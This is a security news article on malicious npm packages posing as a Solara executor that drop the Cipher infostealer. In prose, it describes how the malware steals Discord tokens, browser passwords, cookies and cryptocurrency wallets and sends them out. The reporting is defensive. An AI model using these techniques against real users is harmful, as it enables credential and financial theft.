Article Title:
Malicious npm Packages Masquerade as Solara Executor to Exploit Discord, Browsers, and Cryptocurrency Wallets
In a recent and sophisticated supply chain attack, cybercriminals have infiltrated the npm ecosystem by disguising malicious packages as legitimate tools, specifically targeting Discord users, web browsers, and cryptocurrency wallets. This campaign, identified by JFrog security researchers Guy Korolevski and Meitar Palas on March 12, 2026, involves two deceptive npm packages: `bluelite-bot-manager` and `test-logsmodule-v-zisko`. These packages deliver a Windows executable named `solara 1.0.0.exe` or `solara 1.0.1.exe`, which functions as a dropper for the Cipher information-stealing malware.
Mechanism of Attack
Upon installation, the malicious npm packages execute pre-install scripts that silently download the `solara` executable from a Dropbox-hosted URL. This process requires no user interaction, making the attack particularly insidious. The `solara` executable conceals a 321MB archive containing obfuscated JavaScript, a full Node.js runtime, and an embedded Python script. These components enable the malware to operate independently without further setup by the attacker.
Notably, the `solara` executable was flagged by only one antivirus engine on VirusTotal, as static and heuristic scanners analyzed the clean outer layer of the dropper rather than its hidden malicious contents.
Targeting Discord Users
The Cipher malware aggressively targets Discord by extracting stored session tokens from LevelDB databases across all installed Discord clients and Chromium-based browsers. It then validates each token against Discord’s live API.
For systems running BetterDiscord, the malware patches the application’s core `index.js` file to disable its built-in webhook protection, ensuring that all stolen data can be transmitted to the attacker’s Discord webhook without interference.
On the official Discord desktop client, a secondary JavaScript payload is downloaded from an active GitHub repository and injected directly into the application. This forces the user to log out, capturing their email, password, two-factor authentication codes, and payment card details upon re-login. The injected script also modifies Discord’s startup files to persist across reboots. Additionally, it has the capability, though not activated in this campaign, to trick users into voluntarily changing their account email address in 13 languages.
Exfiltration from Browsers and Cryptocurrency Wallets
The malware employs a dual approach to extract browser credentials. The JavaScript component utilizes Windows Data Protection API (DPAPI) decryption libraries to extract master encryption keys from browser Local State files. It then queries the Login Data SQLite database to steal saved passwords from browsers such as Chrome, Brave, Edge, Opera, and Yandex.
Simultaneously, a Python script, downloaded and installed silently if Python is not already present, targets a broader range of browsers, including Firefox, Vivaldi, CocCoc, and QQ Browser. This script extracts cookies, credit card information, autofill data, bookmarks, and full browsing history.
The malware also scans the system for cryptocurrency wallet directories associated with Bitcoin, Ethereum, Exodus, Electrum, Atomic Wallet, and others. It copies their contents to a staging folder disguised as a Windows system service before attempting to decrypt the Exodus wallet seed file.
All stolen data is compressed into a ZIP archive and uploaded to Gofile or a fallback command-and-control server, ensuring the exfiltration of sensitive information.
Implications and Recommendations
This attack underscores the growing sophistication of supply chain attacks targeting the npm ecosystem. By masquerading as legitimate tools, malicious packages can infiltrate development environments, leading to widespread data breaches and financial losses.
Developers and organizations are advised to exercise caution when incorporating new npm packages into their projects. Implementing strict code review processes, verifying the authenticity of packages, and monitoring for unusual network activity can help mitigate the risk of such attacks.
Additionally, users should regularly update their software and employ robust security measures, such as multi-factor authentication and endpoint protection solutions, to safeguard against potential threats.
